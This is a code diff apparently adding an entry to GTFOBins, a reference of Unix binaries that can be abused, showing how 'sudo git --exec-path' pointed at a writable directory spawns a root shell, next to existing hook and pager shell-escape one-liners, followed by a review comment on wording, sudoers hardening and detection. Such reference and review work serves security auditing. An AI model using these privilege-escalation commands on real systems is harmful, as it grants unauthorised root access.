diff --git a/_gtfobins/git.md b/_gtfobins/git.md
index 89a64bb..737b780 100644
--- a/_gtfobins/git.md
+++ b/_gtfobins/git.md
@@ -35,6 +35,12 @@ functions:
 echo 'exec /bin/sh 0<&2 1>&2' >"$TF/.git/hooks/pre-commit.sample"
 mv "$TF/.git/hooks/pre-commit.sample" "$TF/.git/hooks/pre-commit"
 sudo git -C "$TF" commit --allow-empty -m x
+ - description: If file creation is allowed, it can be used to change Git path
+ code: |
+ mkdir /tmp/git
+ echo '/bin/bash' > /tmp/git/git-escalation
+ chmod +x /tmp/git/git-escalation
+ sudo git --exec-path=/tmp/git escalation
 limited-suid:
 - code: PAGER='sh -c "exec sh 0<&1"' ./git -p help
 ---
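Review bot: The added `description` ("it can be used to change Git path") does not name the precondition or the mechanism, which is what a reader auditing a sudoers rule needs. `--exec-path` sets the directory where Git looks up its `git-<subcommand>` programs, so the entry depends on the sudo rule letting the caller pass arbitrary Git options, not only on file creation. I would reword it along the lines of `description: If the sudo rule does not restrict Git's options, --exec-path can point Git at a writable directory whose git-<name> executable then runs with the elevated privileges.` A sudoers rule that pins the full `git` command line removes this particular path, and a `--exec-path` value under a world-writable directory in sudo logs is a useful detection signal. As a style point, the fixed `/tmp/git` departs from the `$TF` temporary-directory variable used by the entry just above in the same hunk.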